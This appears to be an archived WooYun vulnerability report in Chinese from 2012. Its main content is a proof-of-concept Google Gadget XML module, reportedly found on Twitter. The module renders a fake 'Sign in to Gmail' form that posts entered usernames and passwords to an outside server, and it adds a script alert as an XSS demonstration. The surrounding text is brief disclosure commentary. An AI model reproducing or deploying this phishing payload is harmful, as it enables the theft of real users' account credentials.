乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-11-15: 积极联系厂商并且等待厂商认领中,细节不对外公开 2012-11-15: 厂商已经主动忽略漏洞,细节向公众公开
很严重的一个漏洞
其实我逛twitter发现的poc:
<?xml version="1.0" encoding="UTF-8"?><Module><ModulePrefs title="Gmail Login" title_url="XSS" description="Welcome to Google Services ( Proof of Concept , Details Here : http://goo.gl/q2VPC )" author="The Hacker News" author_email="[email protected]" author_affiliation="NA" author_location="google" category="news" scrolling="false" singleton="false"/><Content type="html"><![CDATA[<center><div style="height:274px;background-color:#abaca7;"><div style="height:274px;background-color:#e7effc;border:5px solid white;padding-top:15px;width:315px;"> <font color="#2c2c2c"><form action="http://news.thehackernews.com/save.php" method="post"> Sign in to Gmail with your<br /> <img src="http://keeperax.netai.net/google.png"><br /><br /> Username: <input type="text" name="username" value="" maxlength="60" ><br /> <div style="padding-top:5px;">Password : <input type="password" name="password" value="" maxlength="60" ><br /><br /> <input type="submit" name="Signin" value="Sign in"><br /><br /> </div></font><font color="blue"><a href="http://google.com/">I cannot access my account</a> </font> </form></div> </div></center><script>alert("just for fun by kindle")</script>]]></Content></Module>
这个我没研究了,很务实的说,我只是顺手看到的
未能联系到厂商或者厂商积极拒绝